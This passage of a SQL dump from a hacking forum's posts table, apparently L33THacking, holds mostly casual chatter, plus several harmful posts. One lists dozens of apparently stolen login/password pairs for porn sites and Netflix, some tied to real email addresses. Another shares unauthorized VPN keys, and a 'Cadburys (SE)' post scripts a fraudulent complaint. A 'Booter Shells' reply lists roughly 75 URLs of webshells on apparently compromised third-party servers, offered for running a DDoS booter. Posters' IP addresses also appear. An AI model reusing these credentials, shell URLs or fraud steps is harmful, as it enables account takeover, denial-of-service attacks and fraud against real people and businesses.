'8e92a5303366bb6d73d9f59e1e52205f', '0', '0'); INSERT INTO mybb_posts VALUES('1719', '332', '1701', '4', 'RE: Hello', '0', '172', 'MistaCode', '1347181707', '[quote=\'iTzIpod\' pid=\'1701\' dateline=\'1347120289\']\r\n[quote=\'MistaCode\' pid=\'1700\' dateline=\'1347119948\']\r\n[quote=\'t3h jok3r\' pid=\'1563\' dateline=\'1346796279\']\r\nWelcome to L33THacking Trojan/Mistacode.\r\n\r\nSince you have come from nerdchat, I have upgraded your account for free.\r\n[/quote]\r\nThanks Dude! I can offer you free graphics if you want?\r\nUserbar, Logo ?\r\n[/quote]\r\n\r\nCan you add me on Skype and show me some of your examples? I bet you\'re better than me! :/\r\n[/quote]\r\n\r\nYeah sure ;) PM me your skype please, or add me: aleksanteri.korhonen', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'e51327ffc2ca05ba13c10cbc6ab764ce', '0', '0'); INSERT INTO mybb_posts VALUES('1720', '369', '0', '55', 'Paypal 1 dollar 50cents', '0', '53', 'sirchamp', '1347182055', 'Hey guys\r\nI need 1.50 on Paypal/LR very urgent. I will pay you back as fast as I can.', '188.155.56.90', '-1130678182', '1', '0', '53', '1347182103', '1', 'ff5e56ccdb8aa122436159fc0c043a9a', '0', '1347182103'); INSERT INTO mybb_posts VALUES('1721', '370', '0', '35', 'Basic L33THACKING logo (just an basic one)', '0', '172', 'MistaCode', '1347182680', 'well this is just an basic one i just made so don\'t dislike :D\r\nIt didn\'t took much time, I can make an better one but lets now just see with this one ;)\r\n\r\n[img]http://i1107.photobucket.com/albums/h400/maxhax195/Logo1.png[/img]\r\n\r\nBackground is Transparent, so what do you think?', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', '46eda5faef092e49d860619739a5ecd7', '0', '0'); INSERT INTO mybb_posts VALUES('1722', '367', '1713', '3', 'RE: Please Read!', '0', '20', 'JakeUS', '1347197021', 'Thanks for the updates.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '878415ee1a9c518d100bc0ee41473c31', '0', '0'); INSERT INTO mybb_posts VALUES('1723', '371', '0', '7', 'How do I make an ICQ account?', '0', '20', 'JakeUS', '1347197111', 'It says I need the password to be in Latin characters.\r\n\r\nCan someone help?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '797e09428a7225ed67a3a1144c1ecd1c', '0', '0'); INSERT INTO mybb_posts VALUES('1724', '370', '1721', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '82', 'iTzIpod', '1347205618', 'Love transparent backgrounds! What font is that? \n\nI rate it a 7/10. Still looks basic and done in a couple of minutes/seconds.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8b43ee4c1a4778c3470525c616c4d14f', '0', '0'); INSERT INTO mybb_posts VALUES('1725', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '82', 'iTzIpod', '1347205690', '[quote=\'sirchamp\' pid=\'1720\' dateline=\'1347182055\']\r\nHey guys\r\nI need 1.50 on Paypal/LR very urgent. I will pay you back as fast as I can.\r\n[/quote]\r\n\r\n\r\nPM me your paypal email. Will try to give it to you on Monday or Tuesday? Sorry :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a255f1393e728ecbf80676d9d177a3f', '0', '0'); INSERT INTO mybb_posts VALUES('1726', '367', '1713', '3', 'RE: Please Read!', '0', '82', 'iTzIpod', '1347205769', 'Looking good.\nThanks for taking the time to fix the errors. I was going to make a thread last night about the 404 Errors...\n\nBut then I couldn\'t because of the 404 Errors -___-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1054affc51a3feda6311070cd5e3c19d', '0', '0'); INSERT INTO mybb_posts VALUES('1749', '372', '1728', '3', 'RE: Reputation', '0', '1', 't3h jok3r', '1347234358', 'Should be fixed by now. Thanks for reporting.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '851b2cad2f82990a65ed72e8b742d216', '0', '0'); INSERT INTO mybb_posts VALUES('1728', '372', '0', '3', 'Reputation', '0', '53', 'sirchamp', '1347206027', 'I cant rep. Always when I click rate, only a blank page comes. Wierd.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '00557f229ca856472669d0fdf2dfa2e6', '0', '0'); INSERT INTO mybb_posts VALUES('1729', '352', '1692', '12', 'RE: Linear Mode How to Take Down Websites Effectively + Proof', '0', '61', 'NXK', '1347206524', '[quote=\'t3h jok3r\' pid=\'1692\' dateline=\'1347079330\']\r\n[quote=\'NXK\' pid=\'1689\' dateline=\'1347078187\']\r\n[quote=\'p420\' pid=\'1687\' dateline=\'1347076992\']\r\n[quote=\'NXK\' pid=\'1660\' dateline=\'1346972166\']\r\nSeems legit. Please add a virus scan for your DoS tool.\r\n[/quote]\r\n\r\nDude there\'s no need for a virus scan because the download link is seized by the Feds.\r\n[/quote]\r\n\r\nThan may I ask why there is a download link?\r\n[/quote]\r\n\r\nI should probably pay attention more aha...\r\n\r\n:roflol:\r\n\r\nThe OP is Spacefish, not P420.\r\n[/quote]', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '0e91101873309d68ab9b1e6d7ae6c365', '0', '0'); INSERT INTO mybb_posts VALUES('1730', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '82', 'iTzIpod', '1347208519', '[quote=\'t3h jok3r\' pid=\'1714\' dateline=\'1347174018\']\r\nI will be creating and giving out 5 @l33thacking.net forwarders to the first 5 people to create 3 HQ threads anywhere on LH. First check in below then post 3 HQ threads and PM me saying you are done or with the links.\r\n\r\n[b]What is a forwarder?[/b]\r\n\r\nFor example: john@l33thacking.net is the forwarder, when someone sends an email to john@l33thacking.net then john@hotmail.com will receive it.\r\n\r\nYou don\'t have to be using hotmail. John@hotmail was an example.\r\n[/quote]\r\nBasically it\'s an email? \r\n\r\nI will try :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52b666bf9a494b85729c6e2c06fa1f22', '0', '0'); INSERT INTO mybb_posts VALUES('1731', '362', '1705', '7', 'RE: List of TOP 10 HACKERS', '0', '82', 'iTzIpod', '1347209190', 'That\'s really cool. Didn\'t realize that :p\r\n\r\nI also thought this thread meant: \"Top 10 Hackers of LH\" :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'daa041fcf3387f11eb784a68452bdd90', '0', '0'); INSERT INTO mybb_posts VALUES('1732', '249', '1716', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1347209509', '[quote=\'Baws\' pid=\'1716\' dateline=\'1347177411\']\r\n[quote=\'iTzIpod\' pid=\'1630\' dateline=\'1346961786\']\r\nLol @Reloadzor but still, I won.\r\n[/quote]\r\n\r\nNot really, by the way, this thread is really LQ.\r\n[/quote]\r\n\r\nI know. \r\n\r\nBut it does boost the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd18470f99ddb3b630ed940fccc40e605', '0', '0'); INSERT INTO mybb_posts VALUES('1733', '372', '1728', '3', 'RE: Reputation', '0', '82', 'iTzIpod', '1347209570', 'Same. I get a Server Error.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '873aac058a8240cc821d775ba3419f59', '0', '0'); INSERT INTO mybb_posts VALUES('1734', '373', '0', '16', 'Cadburys (SE)', '0', '112', '??????Z', '1347209691', 'This is another SE i had done myself. With this you can get anything that Cadburys make, i personally was sent 24 cadburys creme eggs, the more you say you bought the more you get in return, i only complained about 6 creme eggs and received alot more.\r\n\r\nStep 1:\r\ngoto: http://www.cadbury.co.uk/contact.aspx\r\nand click email us.\r\n\r\nStep 2: on the form, for category choose product in the first coice and complaint in the second. then continue to fill out the address and contact details with your correct information.\r\n\r\nin the message put something like this. Hello, Firstly i would like to say i am a huge fan of cadburys. secondly not so much good news i have a complaint, yesterday i purchased (your choice of candy) from (your choice of store) and the candy didnt taste right and the inside of the candy was hard and chewy. (describe the candy to be different to what it is suppose to be like) so i threw the candy away because i felt i would be sick if i ate any more. i was wondering if there is anything you could do about this, Thanks\r\n\r\n\r\nin product name type what it is that you want, leave best before date and lot code empty. \r\n\r\nfor Product Weight/ Multipack Information, put the number of how much of the candy you said you purchased. \r\n for Place of purchase put a well known store, for example i put Morrisons because it is a popular store in england.\r\n\r\nthen send the message. they should get back to you within a day. they emailed me back the next day. and i received my products 5 days later.\r\n\r\nIf i helped you please leave Rep. let me know how you all get on :)', '92.22.248.72', '1545009224', '0', '0', '112', '1347209774', '1', '246561b2b30e1419a4a8136c6627dde3', '0', '1347209774'); INSERT INTO mybb_posts VALUES('1735', '374', '0', '19', '[Junk]PLEASE DELETE', '0', '62', 'R?????zo?', '1347212594', 'PLEASE DELETE PLEASE DELETE PLEASE DELETE PLEASE DELETE PLEASE DELETE\r\n\r\nDOUBLE THREAD.', '94.132.244.168', '1585771688', '0', '0', '62', '1347212777', '1', 'f02bbd754f67552fa2a511fe314f3c63', '0', '1347212777'); INSERT INTO mybb_posts VALUES('1737', '341', '1718', '54', 'RE: Porn passes (big list)', '0', '62', 'R?????zo?', '1347212812', '[quote=\'t3h jok3r\' pid=\'1718\' dateline=\'1347178287\']\r\nThat\'s some huge mother fucking list.\r\n[/quote]\r\n\r\nHeres some more:\r\n\r\n\r\nBrazzers.com Free Premium Account\r\n\r\nFor Login: http://ma.brazzers.com\r\n\r\n\r\nTelly29:lawrence\r\nemack12:knight\r\njonathan:123456\r\nWeasel27:rehellek\r\n\r\n3dxstar.com Free Premium Account\r\n\r\nfor login: http://members.3dxstar.com/access/login\r\n\r\n\r\nmarkot - marina\r\n\r\nBangBros.com Free Premium Account\r\n\r\nfor login: http://login.bangbros.st-secure.com\r\n\r\nfresh and new 100% working enjoy\r\n\r\nNote: use Old MEMBERS AREA\r\n\r\nhttp://mrmandinga:mandinga@members.bangbros.com/\r\n\r\n\r\n\r\nhttp://gmanleo79:Kamehameha@members.bangbros.com/ \r\n\r\n\r\n\r\nhttp://strong7:7jacob@members.bangbros.com/ \r\n\r\n\r\n\r\nhttp://92puddle:92shallow@members.bangbros.com/ \r\n\r\n\r\n\r\nhttp://nhl6101:e1pu55y@members.bangbros.com/\r\n\r\nsisterreunion.com Free Premium Account\r\n\r\n\r\n\r\nFor Login: http://members.sisterreunion.com/\r\n\r\n\r\n\r\njrmizz5:25mizz010584\r\nklaroffm:ku5exa\r\nliqiswi375:daabz24\r\nlouiesam1:053089\r\nmatt0301:0301matt\r\nmexgfltwkk0:quunoolor18\r\nmexgfltnfrq:piquepist33\r\n\r\nmobile.hustler.comFree Premium Account\r\n\r\n\r\n\r\nFor Login: http://mobile.hustler.com/Auth\r\n\r\n\r\n\r\njava2486 - godzilla\r\n5nj2jb - 3x22nd\r\nproboy74 - stormy\r\ndrewwilder1 - nicole\r\ngalcott - glendale\r\np8phm8 - bcr3gh\r\ndevinlad - xogovuq\r\nmarkramsey - rabbit\r\nwildo95 - pervert\r\nmwoollum - mw1125mw\r\n\r\nRealityGang.com Free Premium Account\r\n\r\n\r\n\r\nhitomisima - yuukoogura\r\n\r\n\r\ntbird549 - elijah5\r\n\r\nZtod.com Free Premium Account\r\n\r\n\r\n\r\n\r\nChrisMelt - ChrisMelt88\r\n\r\npornpros.com Free Premium Account\r\n\r\n\r\nbennn100 - grimm100\r\narg1007 - 1007arg\r\nblackqqq - ruffyboy\r\nbullyz - makana4', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c05766f48daf476fff78d7e71e2f9048', '0', '0'); INSERT INTO mybb_posts VALUES('1736', '375', '0', '30', 'Yahoo-ACC-Maker V.1.4', '0', '62', 'R?????zo?', '1347212649', '.::Image::.\r\n[img]http://buspic.com/img/file0af5584df11.jpg[/img]\r\n\r\n.::Scan::.\r\n[img]http://buspic.com/img/fileb6a492cac31.jpg[/img]\r\nhttps://www.virustotal.com/file/fd31b85131b39e796ab1aafe2d6355a475f1a7af07613cd8012596ddf40481dd/analysis/\r\n\r\n\r\nDownload: http://www.mediafire.com/?968usosm95sxsa3\r\n\r\n\r\nI take no credits for this, just sharing :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f02bbd754f67552fa2a511fe314f3c63', '0', '0'); INSERT INTO mybb_posts VALUES('1738', '376', '0', '54', 'ExpressVPN codes', '0', '62', 'R?????zo?', '1347212894', 'Enjoy guys :)[spoiler]WIN:https://www.expressvpn.com/custom_installer?os=win\r\nMAC:https://www.expressvpn.com/custom_installer?os=mac\r\nKEY: EXQR4JPZ1P2Z29UY26EWXKM\r\n\r\n\r\nOne Year Express VPN key! -\r\nEXMPRDDK4CKGT8CNIKCUETX\r\n\r\nKEY: ETMAKSAMMBQKFN7IWZDMPSF\r\n\r\nKEY: EUWUSHZAV4RLHV7JPLKNPDJ\r\nKEY: EQELSNUOTG7SKF261KLYGP7\r\n\r\nKEY: EHBMYW5DN6POCLPYPOQD7W4\r\n\r\nE0ULHPPZFB5DO9LW8M56PE8\r\nEOQZSRVEBULKTSIXGUEWZMQ\r\n\r\nKEY: EPCYT6GPSZBGCITGAOYVWBI\r\n\r\nKEY: EEEU1IAUWDMIBPORTXJQ2JM\r\n\r\nKEY: EIY456DGCIRTJJZZWT5V5TO\r\n\r\nKEY: EQZB803PELCVA5DI1FP8VER\r\n\r\nKEY: ECK4DFUAR1C9FIZRWIPO1IL\r\n\r\nKEY: EK3KTH6KAQYRA13RSCYGLQ2\r\n\r\nKEY: EM2RBAH1DKZDROCEIRCPCP9[/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '383ff95b2638958ce160e4cb2b1e6f79', '0', '0'); INSERT INTO mybb_posts VALUES('1739', '377', '0', '54', 'Netflix accounts', '0', '62', 'R?????zo?', '1347212944', 'Netflix.com Free Premium Account\r\n\r\n\r\nstracc13@yahoo.ca - biggbigg\r\n\r\nfgarzalaredo@aol.com - bravo820\r\n\r\njpark1055@comcast.net - nomar103\r\n\r\nanthjunk@hotmail.com - ripley6\r\n\r\naonehvac@aol.com - saint30542\r\n\r\napplescruff420@yahoo.com - dropout\r\n\r\njervis - jervis\r\n\r\njeanette - jeanette\r\n\r\njamin - jamin\r\n\r\njaman - jaman\r\n\r\njacqui - jacqui\r\n\r\nlauretta - lauretta\r\n\r\nnissa - nissa\r\n\r\nytrewq - qwerty\r\n\r\nmoansjones - daddy71\r\n\r\nhirsch - hirsch\r\n\r\nhomayoun - homayoun\r\n\r\nnelson - nelson\r\n\r\njanine - janine\r\n\r\nkrngq81 - mothugs', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0c87c538f8233c06f8ca4731ec3e630d', '0', '0'); INSERT INTO mybb_posts VALUES('1740', '318', '1493', '9', 'RE: Want to Earn Money by doing Nothing ?', '0', '90', 'duhuh', '1347213684', 'meh whats the fun in gambling for 50 50, its like going to a casino and only playing red or black', '86.180.199.7', '1454688007', '0', '0', '0', '0', '1', '725b3a95a48aa1722f4086f0d6209482', '0', '0'); INSERT INTO mybb_posts VALUES('1741', '176', '874', '12', 'RE: [Tut]How trace an email', '0', '90', 'duhuh', '1347214058', '[quote=\'iTzIpod\' pid=\'874\' dateline=\'1345867236\']\r\nWill try this and post results.\r\n[/quote]\r\n\r\n\r\nGot any results?', '86.180.199.7', '1454688007', '0', '0', '0', '0', '1', '1e6a5906fb3c67eb312f5b287967e60b', '0', '0'); INSERT INTO mybb_posts VALUES('1742', '378', '0', '7', 'How is school for you?', '0', '82', 'iTzIpod', '1347220183', 'Mine is alright. I got the same teacher as last year. He\'s a guy. Awesome teacher. And he barely gives homework. But I got some homework so I gotta finish it. How about you?\r\n\r\nDoing homework at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e739d871248b4dfc88ce350aecc9710e', '0', '0'); INSERT INTO mybb_posts VALUES('1743', '379', '0', '34', 'Itachi\'s Intermediate Signature Tutorial', '0', '82', 'iTzIpod', '1347226893', '[img]http://fc06.deviantart.net/fs71/f/2011/050/1/0/my_intermediate_signature_tut_by_itachi3760-d39w395.png[/img]\n\n\nI would love to try this out :3\nI just don\'t have the render. I would really like that render. ;/\nIf you know it, please tell me? Thanks! :D\n\nWill post my result if I get that sexy render \n\nCredits: Itachi\n\nPost results below\nEnjoy!', '24.212.197.164', '416597412', '1', '0', '82', '1347226940', '1', 'b6829ce4ef1282ed6fc6c44791e5daa8', '0', '1347226940'); INSERT INTO mybb_posts VALUES('1744', '66', '157', '63', 'RE: Read this thread before you make a Request!', '0', '82', 'iTzIpod', '1347227235', '@t3h jok3r, I can\'t edit this post. So can you? Just change the links to .net because it is .com\n\n\nOT: Very HQ and nice guide. It looks like a thread design. I thought it was :3 But it wasn\'t.\n\n10/10 for thread creativity.\n10/10 for the HQ thread.\n\n\nIn my opinion, this should be stickied?', '24.212.197.164', '416597412', '1', '0', '82', '1347227303', '1', '0a394b9d5dce5e99d0628de8fe81760a', '0', '1347227303'); INSERT INTO mybb_posts VALUES('1745', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '112', '??????Z', '1347229657', 'awesome. nice idea! :)', '92.22.248.72', '1545009224', '0', '0', '0', '0', '1', 'e52749532fd26cb0a57c17af2b197140', '0', '0'); INSERT INTO mybb_posts VALUES('1746', '380', '0', '34', 'Simple Signature Tutorial', '0', '82', 'iTzIpod', '1347230245', '[img]http://fc03.deviantart.net/fs30/f/2008/153/b/1/Simple_Signature_Tutorial_by_AD_Praxis.png[/img]\n\nEnjoy!\nPost results below.\n\nCredits: Praxis\n\n\n\nDang. Looks very cool. Will be making this but I can\'t find the render :/\nBut I might use a different one instead. Gonna try it and post my results later.\n\n\n\nEDIT: \n[img]http://i.imgur.com/9xOcT.png[/img]\nEw. I rushed it because I had to finish my homework. :/', '24.212.197.164', '416597412', '1', '0', '82', '1347232958', '1', 'b28da16d561136e1c824920f45434354', '0', '1347232958'); INSERT INTO mybb_posts VALUES('1747', '381', '0', '3', 'Server Error', '0', '82', 'iTzIpod', '1347233155', '[img]http://i.imgur.com/Shrop.png[/img]\nCan\'t view my rep details.. :/\nI tried refreshing countless times. And this has still occurred. \n\nAnd also, instead of spamming threads about these bugs, I will just edit my encounters in here.', '24.212.197.164', '416597412', '1', '0', '1', '1347234053', '1', '67dfa19dc31d7607bec590576ce34629', '0', '1347234053'); INSERT INTO mybb_posts VALUES('1748', '363', '1706', '8', 'RE: Top 10 songs of September 2012', '0', '82', 'iTzIpod', '1347233317', 'Lol @ \"transparent\" text.\n\n\nHeard of some of the songs. \n\nKinda disappointed Drake isn\'t in there :\'(\n\n\nSigh.. Drake..\n\nNever heard Good Time before. \nGonna give it a try?', '24.212.197.164', '416597412', '1', '0', '82', '1347233339', '1', '2472bea94780ac4863ebde40ec9d0a02', '0', '1347233339'); INSERT INTO mybb_posts VALUES('1750', '381', '1747', '3', 'RE: Server Error', '0', '1', 't3h jok3r', '1347234400', 'Fixed now, I visited the link in the image and it works perfectly now. Thanks for reporting.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'b17fdee58adf3cee5c96769011ece5d0', '0', '0'); INSERT INTO mybb_posts VALUES('1751', '378', '1742', '7', 'RE: How is school for you?', '0', '61', 'NXK', '1347234688', 'It\'s fun for me ATM. Good thing about college, I get to learn and study about something that I love all day.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b942a725afc30f9a30b09830389038be', '0', '0'); INSERT INTO mybb_posts VALUES('1752', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '1', 't3h jok3r', '1347236127', 'Great list of free VPNs, very useful for people who can\'t afford paid VPNs or don\'t want to invest.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3ea9954f6d542325d8e9fd9fe4e705f7', '0', '0'); INSERT INTO mybb_posts VALUES('1753', '362', '1705', '7', 'RE: List of TOP 10 HACKERS', '0', '8', 'spacefish36', '1347237432', '@ iTzIpod LOL, if that was the case then the Feds would be all over LH.\n\n@OP Nice threads, I only heard about kevin but if he really is the top then why did facebook or microsoft hire him?', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '57957f59650d01b87992cb52b6c7c376', '0', '0'); INSERT INTO mybb_posts VALUES('1754', '352', '1652', '12', 'RE: How to Take Down Websites Effectively + Proof', '0', '8', 'spacefish36', '1347237507', 'Sorry guys i didn\'t know that the link was dead lol', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '434af65dbb8350501a81af92bb572bbd', '0', '0'); INSERT INTO mybb_posts VALUES('1755', '378', '1742', '7', 'RE: How is school for you?', '0', '8', 'spacefish36', '1347237561', 'My schools going perfectly.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '81803887f01c7a828f28a5d6b15f990c', '0', '0'); INSERT INTO mybb_posts VALUES('1756', '354', '1656', '23', 'RE: [MBAM] Self-Help Removal Tutorials', '0', '8', 'spacefish36', '1347237614', 'Mother fucker. Huge list thanks for this man.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '751aabc2d5fa2babbed0a7dfb40592a8', '0', '0'); INSERT INTO mybb_posts VALUES('1757', '360', '1694', '58', 'RE: What are the official groups?', '0', '8', 'spacefish36', '1347237703', 'Damn only two groups? I might suggest a group to LH', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'e567ada73a460b1ea60089f8e5773aff', '0', '0'); INSERT INTO mybb_posts VALUES('1758', '216', '858', '52', 'RE: Making a world wide SMS Bomber in VB.net - TUT', '0', '8', 'spacefish36', '1347237893', 'I\'ll be making one SMS Bomber today and your last link doesn\'t work.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '17257d69499d83a92886bdaf70ed3138', '0', '0'); INSERT INTO mybb_posts VALUES('1759', '317', '1685', '61', 'RE: Unique\'s Purpose', '0', '1', 't3h jok3r', '1347246213', '[quote=\'p420\' pid=\'1685\' dateline=\'1347076729\']\nQuick Question: Why are only the LH Mods leaders? Well now NXK is Staff but before he was Mod.\n[/quote]\n\nYou can request a group to. You don\'t have to be a Mod, Staff or Admin to request a official group.', '72.229.164.105', '1223009385', '1', '0', '1', '1347246329', '1', 'ee5d254bba81c695bdaff57954a12ce5', '0', '1347246329'); INSERT INTO mybb_posts VALUES('1760', '382', '0', '43', '[file ice]4 windows 8 keys', '0', '1', 't3h jok3r', '1347247699', 'http://window8serialkeys.blogspot.com/\r\n\r\n4 available. Use fakenamegenerator to bypass surveys.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6eeceeae01e07f70f769946ab9ca440e', '0', '0'); INSERT INTO mybb_posts VALUES('1761', '370', '1721', '35', 'RE: Basic L33THACKING logo (just an basic one)', '0', '1', 't3h jok3r', '1347248932', 'Just saw this thread. Logo is kinda basic, thanks for your input though. I check it and doesn\'t look good on the site but if you can make a better one then I can give that one a try too.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '6d3f45aeceeb1e43f976e480bc129c6e', '0', '0'); INSERT INTO mybb_posts VALUES('1762', '345', '1632', '63', 'RE: Need userbar! [Gamers{]', '0', '1', 't3h jok3r', '1347249002', 'Both look kinda same but I would say the second one a bit better than the first one.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '453806828eb4f2f96512dd6125a51653', '0', '0'); INSERT INTO mybb_posts VALUES('1764', '377', '1739', '54', 'RE: Netflix accounts', '0', '1', 't3h jok3r', '1347249436', 'It\'s it\'s it\'s sooo beautiful <sniff sniff> \n\nI\'m talking about your sig ;)\n\nThanks for the netflix accounts. A lot of people request premium netflix accounts.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', 'c5cef801f3119badaf4094093374f5a8', '0', '0'); INSERT INTO mybb_posts VALUES('1765', '383', '0', '29', 'Paypal Withdrawy to cash or debit card [TUT DL]', '0', '112', '??????Z', '1347258711', 'okay so with these methods you can withdraw your paypal cash either to cash or debit card, the cash one is very useful if you don\'t want to give any of your personal information to paypal. These tutorials was given to my by a friend so credit doesn\'t belong to me, but if this helped you then please +Rep me. thanks\r\n\r\nWithdraw to debit card: http://www.mediafire.com/?z44xmusno4zj12h\r\n\r\nWithdraw to cash: http://www.mediafire.com/?c8i97f2oa8jbx4b', '92.22.255.215', '1545011159', '0', '0', '0', '0', '1', 'a43fb032eb15d33692fdf9feb0c0a5ab', '0', '0'); INSERT INTO mybb_posts VALUES('1766', '369', '1720', '55', 'RE: Paypal 1 dollar 50cents', '0', '67', 'HoverCatz', '1347277657', 'I can send you if you still need it. I may send 2 due to the fee', '193.161.89.201', '-1046390327', '1', '0', '0', '0', '1', 'c7ab36040f8c28a9e97be62dc2650636', '0', '0'); INSERT INTO mybb_posts VALUES('1767', '384', '0', '55', 'Booter Shells', '0', '67', 'HoverCatz', '1347299119', 'Hey. Im in need of some working shells. Doesnt need to be private ones, but that they work. If my booter is a success, i may give you some of the cash i make on it. Note, i always remember stuff people do for me, so i will almost always do something in return.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '3d79d2aa6f3173a903175056d3445c7f', '0', '0'); INSERT INTO mybb_posts VALUES('1768', '385', '0', '19', '[Junk][Important] Discussion', '0', '82', 'iTzIpod', '1347305265', 'I\'m thinking about leaving LH.\r\nWhat are your thoughts?', '24.212.197.164', '416597412', '1', '0', '82', '1348107416', '1', 'f63ab509ecd692ab20c6b597d8287617', '0', '1348107416'); INSERT INTO mybb_posts VALUES('1769', '385', '1768', '19', 'RE: Discussion', '0', '9', 'p420', '1347313251', 'Don\'t, why do you want to leave LH?\n\nYou have respect, you have the most awards, you run a official group(free), you are a Mod. You would not just lose all this but LH would lose a lot of activity as well.', '173.245.64.117', '-1376436107', '0', '0', '0', '0', '1', '4944879c5865b5b57ba584c441cf0469', '0', '0'); INSERT INTO mybb_posts VALUES('1770', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '1', 't3h jok3r', '1347326964', 'Done, sent to your kennerz. Thanks for the HQ threads.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '66d854e4f3f658eb74eb23fa707149d3', '0', '0'); INSERT INTO mybb_posts VALUES('1771', '384', '1767', '55', 'RE: Booter Shells', '0', '5', 'Timmy', '1347327508', 'Not sure if they work or not but check them on a shell checker. \n\n[code]\n192.163.135.131/webdav/shells.php\n192.163.135.104/webdav/shells.php\n192.163.135.115/webdav/shells.php\n192.163.135.101/webdav/shells.php\nhttp://c3sd.com/webdav/x32.php\nhttp://80.72.41.147/webdav/x32.php\nhttp://84.77.246.35/webdav/x32.php\nhttp://hardstyle-creation.de/webdav/x32.php\nhttp://dns-office.vz.ae/webdav/x32.php\nhttp://lovencompany.com/webdav/x32.php\nhttp://trandigital.com/webdav/x32.php\nhttp://ftpserver.inwindowoutdoor.com/webdav/x32.php\nhttp://nevyhazujto.cz/webdav/x32.php\nhttp://115.64.70.98/webdav/x32.php\nhttp://enwalker84.zombiefire.com/webdav/x32.php\nhttp://asterware.net/webdav/x32.php\nhttp://222.124.219.220/webdav/x32.php\nhttp://yegenkids.com/webdav/x32.php\nhttp://69.70.21.244/webdav/x32.php\nhttp://75.127.113.116/webdav/x32.php\nhttp://122.226.220.7/webdav/x32.php\nhttp://87.106.182.104/webdav/x32.php\nhttp://85.232.156.145/webdav/x32.php\nhttp://81.25.26.80/webdav/x32.php\nhttp://parkstagedoor.com/webdav/webdav.php\nhttp://milkmytorrent.com/webdav/webdav.php\nhttp://62.174.90.10/webdav/webdav.php\nhttp://83.169.10.151/webdav/x32.php\nhttp://217.16.8.44/webdav/x32.php\nhttp://203.37.179.130/webdav/x32.php\nhttp://freedenverdeals.com/webdav/x32.php\nhttp://teslatronic.net/webdav/x32.php\nhttp://embarquefacil.com.br/webdav/x32.php\nhttp://pavesouth.com/webdav/x32.php\nhttp://playing-by-heart.com/webdav/x32.php\nhttp://salfetky.com/webdav/x32.php\nhttp://ccpsoft.de/webdav/x32.php\nhttp://coaching.wsptwp.eu/webdav/x32.php\nhttp://dreamtec.eu/webdav/x32.php\nhttp://camperdiem.es/webdav/x32.php\nhttp://eachsaturday.com/webdav/x32.php\nhttp://key-cs.nl/webdav/x32.php\nhttp://gamefameusa.com/webdav/x32.php\nhttp://esmclan.nl/webdav/x32.php\nhttp://todoejercicios.com/webdav/x32.php\nhttp://202.162.77.12/webdav/x32.php\nhttp://khuphodem.com/webdav/x32.php\nhttp://eye-channel.nl/webdav/x32.php\nhttp://dltz.nl/webdav/x32.php\nhttp://wilco-online.nl/webdav/x32.php\nhttp://online-reisgids.nl/webdav/x32.php\nhttp://ethicgamers.com/webdav/x32.php\nhttp://led3d.net/webdav/x32.php\nhttp://wdc.geophys.cn/webdav/x32.php\nhttp://yameile.com.tw/webdav/x32.php\nhttp://jjhydro.com/webdav/x32.php\nhttp://mogeyq.co.cc/webdav/x32.php\nhttp://f1onacharge.com/webdav/x32.php\nhttp://praxissoftware.co.nz/webdav/x32.php\nhttp://aknr.com/webdav/x32.php\nhttp://hulettscoffeequest.co.za/webdav/x32.php\nhttp://mail.inventiveprint.co.uk:8080/webdav/x32.php\nhttp://egg-leo.co.cc/webdav/x32.php\nhttp://life-digital.co.cc/webdav/x32.php\nhttp://citylife.co.za/webdav/x32.php\nhttp://shouthost.tk/webdav/x32.php\nhttp://diesamariter-villach.at/webdav/x32.php\nhttp://hrs-spiratube.com/webdav/x32.php\nhttp://tqm.co.th/webdav/x32.php\nhttp://neocen.com/webdav/x32.php\nhttp://ideasjuggler.com/webdav/x32.php\nhttp://21mmm.com/webdav/x32.php\nhttp://olcc.nlc.gov.cn/webdav/x32.php\nhttp://tomgroup.com/webdav/x32.php\n[/code]', '72.229.164.105', '1223009385', '1', '0', '5', '1347327532', '1', '487c7d60d4a18bfb3c011d20d5b16d62', '0', '1347327532'); INSERT INTO mybb_posts VALUES('1772', '386', '0', '24', 'Rar Password Unlocker v2.1', '0', '5', 'Timmy', '1347328500', 